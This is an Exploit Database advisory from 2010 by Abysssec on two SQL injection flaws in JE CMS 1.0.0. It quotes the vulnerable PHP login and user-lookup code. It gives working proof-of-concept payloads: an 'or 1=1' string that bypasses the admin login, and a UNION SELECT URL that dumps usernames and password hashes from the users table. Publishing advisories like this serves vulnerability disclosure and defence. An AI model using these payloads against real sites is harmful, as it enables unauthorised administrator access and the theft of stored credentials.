JE CMS 1.0.0 – Authentication Bypass

• Exploit Database
• 13 阅读

• 作者： Abysssec
  日期： 2010-09-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15141/

• '''
  ________ __ ____
   |\/|/ __ \ /\| || |_ \ 
   | \/ | || | /\ | || | |_) |
   | |\/| | || |/ /\ \| || |_ < 
   | || | |__| / ____ \ |__| | |_) |
   |_||_|\____/_/\_\____/|____/ 
  
  http://www.exploit-db.com/moaub-28-je-cms-1-0-0-bypass-authentication-by-sql-injection-vulnerability/
  '''
  
   
  Title: JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability
  Affected Version : JE CMS <= 1.0.0
  VendorSite : joenasejes.cz.cc
  Discovery : abysssec.com
  
   
  Vulnerabilites :
  
  1. Bypass Authentication by SQL Injection Vulnerability
  
  in administrator\login.php page, lines 16-20:
  if (isset($_REQUEST['username'])) {
  	$username = $_REQUEST['username'];
  	$password = $_REQUEST['password'];
  	$result = $core->userLogin();
  	
  	
  userLogin() function is in administrator\library\functions.php. in lines 129-139:
  		if ($userName == '' || $password == '') {
  			$errorMessage = JE_MISMATCH_USERNAME_PASSWORD;
  		}else {
  			// check the database and see if the username and password combo do match
  			$sql = "SELECT userid
  					FROM users 
  					WHERE username = '".$userName."' 		// vulnerability is here
  					AND password = '".$this->getHash($password)."'	// vulnerability is here
  					AND usertype = 1
  					AND block = 0";
  			$result = $this->JEQuery($sql);
  
  POC:
  
  in administrator/login.php:
  
  username: admin' or '1'='1
  password: admin' or '1'='1
  
  2. SQL injection in administrator\index.php on "userid" parameter:
  
  in administrator\index.php file line 12:
  $userid			= 	$_REQUEST['userid'];
  lines 52-53:
  	case 'edituser' :
  		$user = $core->getUser($userid);
  		
  getUser function is in administrator\library\functions.php file. lines 578-583:
  
  	function getUser($id){
  		
  		$sql = "SELECT *
  				FROM users
  				WHERE userid = ".$id;	// vulnerability is here
  		$result = $this->JEQuery($sql);
  
  POC:
  
  http://site/joenas-ejes/administrator/index.php?jepage=edituser&userid=1 and 1=2 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12 from users--